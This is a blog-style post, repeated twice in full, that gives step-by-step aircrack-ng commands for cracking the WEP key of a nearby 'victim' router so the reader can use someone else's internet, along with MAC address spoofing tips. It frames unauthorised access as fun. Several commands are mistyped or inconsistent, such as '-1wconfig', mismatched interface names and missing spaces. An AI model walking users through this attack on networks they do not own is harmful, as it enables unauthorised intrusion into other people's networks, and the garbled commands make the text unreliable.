Wireless Stuffs.... ( Hack to Learn never learn to hack )
I know how it feels when u have no Internet of ur own and u really need it. If there is any wireless network in range and u don't know the WEP Key of that network it feel more bad.
And if u are a computer engineer and u still not able to crack the WEP Key , then its owful...
Don't worry guys.. Try this.... Crack the WEP.. Njoy :)
1. MAC Filtering
2. MAC Spoofing
lets start the FUN
Check the MAC address of the hardware
ipconfig /all
getmac
These bothh commands are use to check the MAC address of the available hardwares.
If u wanna change the MAC Address
config -> Advance -> Network Address
Time of Some Wireless Hacking... WEP Key
Wired Equivalent Protection/privacy (WEP)
Hey u all u need atleast 20K data packets to crack the WEP Key.
Insert the LINUX Backtrack Disk into the disk Drive.
Follow the steps correctly..
1. First check the name of wireless card
-1wconfig after run this command u got the name of ur target wireless card for example ( wifi0 )
2. Now put this card in monitor mode
-airmon-ng start wifi0 This command enable the monitor mode for card wifi0.
3.Check the wireless connection present in range
-airodump-ng athl
4. To collect the datapacket u need some informations.
a: BSSID of Victim Router
b: Channel of the Victim Router
c: ESSID of the Victim Router.
These all informations are received by the upper command ( -airodump-ng athl )
5. Now start collecting the packets
-airodump-ng -c 1--bssid 00:22:3F:32:87:AE -w abc ath1
ath1 is the name of card in which is in monitor mode.
Now open the new shell to run this command.
6. To ping associated with router.
-aireplay-ng -1 0 -a 00:22:3F:32:87:AE -e mannu ath
suppose that mannu is the name of the network.
Now open another new shell to run this command.
7: To associate with router again and again
-aireplay-ng -3 -b 00:22:3F:32:87:AE -e mannu ath1
wait few seconds untill u have 20K or more data packets.
8: To retrive the key from these data packets, run this command in ur shell
-aircrack-ng 64--bssid 00:22:3F:32:87:AE abc-01.cap
The file name is something like abc-01.cap
Run the uppar command again in a new shell and remove the colon ( : ) from the whole string u received.
The end string is ur WEP Key for the router.
Thankx and Regards
Manmohan Mishra
Computer Engineer
I know how it feels when u have no Internet of ur own and u really need it. If there is any wireless network in range and u don't know the WEP Key of that network it feel more bad.
And if u are a computer engineer and u still not able to crack the WEP Key , then its owful...
Don't worry guys.. Try this.... Crack the WEP.. Njoy :)
1. MAC Filtering
2. MAC Spoofing
lets start the FUN
Check the MAC address of the hardware
ipconfig /all
getmac
These bothh commands are use to check the MAC address of the available hardwares.
If u wanna change the MAC Address
config -> Advance -> Network Address
Time of Some Wireless Hacking... WEP Key
Wired Equivalent Protection/privacy (WEP)
Hey u all u need atleast 20K data packets to crack the WEP Key.
Insert the LINUX Backtrack Disk into the disk Drive.
Follow the steps correctly..
1. First check the name of wireless card
-1wconfig after run this command u got the name of ur target wireless card for example ( wifi0 )
2. Now put this card in monitor mode
-airmon-ng start wifi0 This command enable the monitor mode for card wifi0.
3.Check the wireless connection present in range
-airodump-ng athl
4. To collect the datapacket u need some informations.
a: BSSID of Victim Router
b: Channel of the Victim Router
c: ESSID of the Victim Router.
These all informations are received by the upper command ( -airodump-ng athl )
5. Now start collecting the packets
-airodump-ng -c 1--bssid 00:22:3F:32:87:AE -w abc ath1
ath1 is the name of card in which is in monitor mode.
Now open the new shell to run this command.
6. To ping associated with router.
-aireplay-ng -1 0 -a 00:22:3F:32:87:AE -e mannu ath
suppose that mannu is the name of the network.
Now open another new shell to run this command.
7: To associate with router again and again
-aireplay-ng -3 -b 00:22:3F:32:87:AE -e mannu ath1
wait few seconds untill u have 20K or more data packets.
8: To retrive the key from these data packets, run this command in ur shell
-aircrack-ng 64--bssid 00:22:3F:32:87:AE abc-01.cap
The file name is something like abc-01.cap
Run the uppar command again in a new shell and remove the colon ( : ) from the whole string u received.
The end string is ur WEP Key for the router.
Thankx and Regards
Manmohan Mishra
Computer Engineer
